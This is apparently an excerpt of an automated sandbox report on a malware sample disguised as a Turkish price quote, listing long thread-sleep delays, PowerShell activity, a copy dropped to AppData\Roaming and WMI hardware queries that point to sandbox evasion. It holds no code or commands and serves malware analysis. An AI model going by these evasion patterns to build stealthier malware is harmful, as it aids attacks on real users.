Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599734
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599625
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599516
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599391
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599281
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599162
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599031
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 598797

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5977	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 362	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5941	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Window / User API: threadDelayed 4328	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Window / User API: threadDelayed 5356	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Window / User API: threadDelayed 2088
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Window / User API: threadDelayed 7730

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 6644	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4856	Thread sleep count: 5977 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2892	Thread sleep count: 362 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6984	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep count: 36 > 30	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7192	Thread sleep count: 4328 > 30	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -599668s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -599422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -599211s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -599032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -598875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -598749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -598640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -598416s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -598309s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -99859s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7192	Thread sleep count: 5356 > 30	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -99749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -99640s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -99516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -99391s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -99281s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -99171s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -99047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98928s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98812s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98342s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98230s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -98016s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -97906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -97797s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -97687s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -97469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -97359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -97249s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179996s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179780s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179670s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179330s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -179109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178999s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178890s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178671s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178562s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178342s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178234s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178125s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -178015s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -177906s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe TID: 7188	Thread sleep time: -177796s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7544	Thread sleep count: 2088 > 30
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -599874s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7544	Thread sleep count: 7730 > 30
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -599734s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -599625s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -599516s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -599391s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -599281s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -599162s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -599031s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -598922s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -598797s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -99875s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -99766s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -99651s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -99532s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -99422s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -99282s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -99157s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -99032s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -98918s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -98813s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -98688s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -98563s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -98438s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -98313s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -98203s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -98094s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -97969s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -97860s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -97735s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -97610s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -97485s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -97360s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -97235s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -97110s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -96985s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -96860s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -96735s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -96610s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -96485s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -96360s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -96235s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -96086s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -179770s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -179641s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -179531s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -179422s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -179313s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -179188s >= -30000s
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe TID: 7536	Thread sleep time: -179063s >= -30000s

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599668	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599422	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599211	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598875	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598749	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598640	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598416	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 598309	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 99749	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 99640	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 99391	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 99281	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 99171	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 99047	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98928	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98812	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98688	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98578	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98342	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98230	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 98016	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 97906	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 97797	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 97687	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 97578	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 97469	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 97359	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 97249	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179996	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179890	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179780	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179670	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179562	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179453	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179330	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179218	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 179109	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178999	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178890	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178781	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178671	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178562	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178453	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178342	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178234	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178125	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 178015	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 177906	Jump to behavior
Source: C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe	Thread delayed: delay time: 177796	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599874
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599734
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599625
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599516
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599391
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599281
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599162
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 599031
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 598922
Source: C:\Users\user\AppData\Roaming\cYDnGbgU.exe	Thread delayed: delay time: 598797
